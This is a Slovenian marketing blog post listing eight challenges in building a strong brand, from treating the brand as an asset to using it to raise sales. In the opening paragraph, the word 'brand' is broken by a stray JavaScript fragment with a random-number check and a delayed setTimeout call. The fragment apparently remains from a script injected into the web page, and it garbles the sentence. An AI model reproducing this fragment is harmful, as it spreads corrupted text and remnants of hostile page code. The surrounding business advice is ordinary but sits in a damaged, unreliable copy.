fbpx

Zgradite močno blagovno znamko

Zgradite močno blagovno znamko

Močna blagovna znamka je prava pot do uspeha!

Če je vaš cilj zgraditi močno blagovno znamko, potem ste na pravem mestu. Spodaj vam namreč predstavljamo nekaj »izzivov« s katerimi se boste morali spopasti, v kolikor boste želeli narediti vaš “brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and” močnejši.

IZZIV 1 – Obravnavanje blagovne znamke kot premoženje/sredstvo

Pritiski, da ustvarite kratkoročne finančne rezultate pogosto pripelje do točke, ko se podjetje osredotoči predvsem na taktiko in vse tisto, kar lahko »meri« in prinaša kratkoročno pozitivne učinke, hkrati pa popolnoma zanemari enega najpomembnejših dolgoročnih ciljev. To je zgraditi močno blagovno znamko, ki na trgu tudi nekaj pomeni.

IZZIV 2 – Imeti prepričljivo vizijo

Vizija podjetja mora biti prepričljiva, mora se razlikovati od konkurence, mora biti skladna s tem kar pričakujejo/zahtevajo kupci in mora biti usmerjena tako, da daje navdih zaposlenim. Mora biti seveda izvedljiva in omogočati, da lahko zgradite močno blagovno znamko. Vizije, ki so po navadi najuspešnejše so prilagodljive različnim konceptom. Povzemajo koncepte kot so »osebnost« blagovne znamke, organizacijske vrednote, višji cilji. Pomembno je torej, da presegajo okvire funkcionalnih koristi in stremijo k nečem večjim.

IZZIV 3 – Ustvariti nove podkategorije

Edini način, da podjetje dolgoročno preživi, z redkimi izjemami je, da razvija vedno nove in nove inovacije, ki tvorijo nove podkategorije in prepričujejo konkurenci, da prevzame nadzor. To pa seveda zahteva resne transformacije, inovacije in zmožnost dojemanja in upravljanja s takšnimi podkategorijami na način, da zagotavljajo dolgoročno uspešnost podjetja.

IZZIV 4 – Ustvarjati vedno znova izjemne ideje

Izjemne ideje in njihova izvedba so nujno potrebne za to, da lahko blagovna znamka zaživi. Takšne ideje in sama izvedba le teh so dosti bolj kritične kot proračun podjetja. »Dobro« ni dovolj dobro. Strmeti je potrebno k odličnosti in takšne izdelke/storitve dati na trg čim prej.

IZZIV 5 – Do oglaševanja pristopati celostno

Obstaja mnogo metod oglaševanja med katerimi lahko izbirate. Vse od klasičnega oglaševanja, sponzorstva, digitalnega oglaševanja, mobilnega oglaševanja, socialnih medijev in še in še. Te metode težijo k temu, da raje »tekmujejo« med sabo kot pa sodelujejo. Nujno je torej, da najdete možnost celostnega pristopa k oglaševanju. Da stremite k združevanju teh metod in ne izključevanju.

IZZIV 6 – Imeti pravo digitalno strategijo

To področje je kompleksno, dinamično in zahteva drugačno miselnost. Realnost je namreč ta, da ima tukaj nadzor občinstvo. Do občinstva je potrebno pristopati na popolnoma drug način. Poiskati je potrebno njihove potrebe in vaše aktivnosti prilagoditi le tem.

IZZIV 7 – Blagovno znamko graditi tudi navznoter

Težko je zgraditi uspešno blagovno znamko brez vedenja zaposlenih kaj sploh je vizija podjetja, ter brez tega, da se z njo tudi poistovetijo. Vizija blagovne znamke, ki ji primanjkuje višjih ciljev, pogosto pomeni, da je z njo skoraj nemogoče navdihniti zaposlene, kar pa zelo oteži dosego vašega cilja. Zgraditi močno blagovno znamko tako navzven, kot tudi navznoter.

IZZIV 8 – Izkoriščati vrednost blagovne znamke za povečanje prodaje

Na začetku smo omenili, da morate blagovno znamko obravnavati kot premoženje podjetja. Na tej točki pa je čas, da to premoženje izkoristite. Uporabite torej vašo blagovno znamko tako, da boste zaradi nje prodali več, dražje ter z večjo dodano vrednostjo. Sedaj je čas, da unovčite vaše največje sredstvo in izkoristite tisto za kar ste se trudili ves čas.

0 Komentarjev

Odgovori

Vaš e-naslov ne bo objavljen. * označuje zahtevana polja

*